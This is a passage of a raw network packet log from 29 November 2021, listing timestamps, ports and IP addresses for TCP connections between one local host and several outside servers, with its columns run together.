                                                                                                                                                    Nov 29, 2021 14:10:34.713401079 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.713527918 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.713587999 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713644028 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713707924 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.713865042 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.714075089 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.716610909 CET8049835192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.716801882 CET4983580192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.716861010 CET4983580192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.870913029 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871009111 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871124983 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871146917 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.871182919 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.871298075 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871329069 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.871373892 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871392965 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871503115 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.871536970 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871558905 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871692896 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.871767044 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871797085 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871859074 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.871917009 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871946096 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.872018099 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.872040033 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.872040033 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.872132063 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.872134924 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.872313976 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.872396946 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.872488976 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.872664928 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.877321959 CET8049835192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.878040075 CET8049835192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.878144026 CET8049835192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.878326893 CET4983580192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.912861109 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.913027048 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.028831959 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.028911114 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.028944969 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.028984070 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029019117 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.029083967 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.029128075 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.029311895 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029371977 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.029450893 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029479980 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.029594898 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029647112 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029664040 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.029722929 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029839039 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029962063 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.030042887 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030086040 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030101061 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.030168056 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030221939 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030268908 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030311108 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030343056 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030374050 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030405045 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030436039 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030466080 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030497074 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.038759947 CET8049835192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.070578098 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.186912060 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.187306881 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.188060045 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.188308954 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.188502073 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.188627005 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.188791990 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.188915968 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.189075947 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288507938 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288567066 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288579941 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.288747072 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.288829088 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288888931 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288933039 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.288943052 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.288996935 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.289057016 CET804983981.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.289103031 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.289282084 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.289299965 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.289401054 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.315129995 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.315352917 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.315397978 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.315449953 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.315572977 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.315701008 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.315717936 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.315831900 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.315939903 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.315968990 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316063881 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316109896 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.316131115 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316241980 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316243887 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.316337109 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316437960 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316473961 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.316502094 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316591024 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.316600084 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316653967 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316705942 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316759109 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316768885 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.316812992 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316867113 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316924095 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.316976070 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.317011118 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.317029953 CET804983981.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.317341089 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.342122078 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.342365026 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.343517065 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.343581915 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.343646049 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.343678951 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.343751907 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.343880892 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.344052076 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344060898 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.344111919 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344146013 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344177008 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344207048 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344229937 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.344355106 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344389915 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344413996 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.344530106 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344563007 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344588041 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.344633102 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344759941 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.344790936 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344877958 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344911098 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.344938993 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.345036030 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.345068932 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.384805918 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.795722008 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:50.862052917 CET804983981.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:51.376867056 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:51.376931906 CET804983881.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:51.377116919 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:51.377192974 CET4983880192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:51.388405085 CET804983981.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:51.388493061 CET804983981.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:51.388549089 CET804983981.2.194.128192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:51.388669968 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:51.388739109 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:10:51.388756037 CET4983980192.168.11.2081.2.194.128
                                                                                                                                                    Nov 29, 2021 14:11:00.914674997 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.923845053 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.924052954 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.925525904 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.925601959 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.925743103 CET4984180192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.934706926 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.934814930 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.934926987 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.934962988 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935058117 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.935184956 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.935256958 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935302019 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935334921 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935360909 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.935401917 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935436964 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935468912 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935507059 CET8049841172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.935539007 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.935683012 CET4984180192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.935719013 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.935765028 CET4984180192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.944616079 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.944683075 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.944808960 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.944833994 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.944925070 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.944978952 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.944989920 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945065022 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945102930 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945183039 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945184946 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:00.945216894 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945274115 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945310116 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945360899 CET8049840172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.945390940 CET4984080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:11:06.427162886 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.427638054 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.427856922 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.427885056 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.428582907 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.428894997 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.428915977 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.428929090 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429075956 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429095984 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429109097 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429135084 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.429168940 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.429356098 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429405928 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429528952 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.429599047 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429620028 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429632902 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429646015 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429668903 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.429696083 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429742098 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429790974 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429850101 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.429980993 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.430152893 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430174112 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430185080 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430202007 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430217981 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430569887 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.430735111 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430820942 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.430840969 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.430866003 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.430985928 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431001902 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431034088 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431082964 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431180954 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431206942 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.431231022 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.431360006 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431380033 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431407928 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431421995 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431457043 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431472063 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431499004 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.431529999 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.431647062 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431665897 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431693077 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.431740046 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.431850910 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.436302900 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.436345100 CET4434984220.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.436352015 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.436512947 CET49842443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:06.453933954 CET804984466.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.454161882 CET4984480192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.454262972 CET4984480192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.465321064 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.465368032 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.465537071 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.465667963 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.465846062 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.465931892 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.466198921 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.466551065 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.466820002 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.467057943 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.467324018 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.467436075 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.467731953 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.611901045 CET804984466.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.635694981 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.635817051 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.635941982 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.635976076 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.635996103 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636066914 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.636202097 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.636286974 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636528969 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636547089 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636599064 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.636635065 CET804984366.29.140.185192.168.11.20
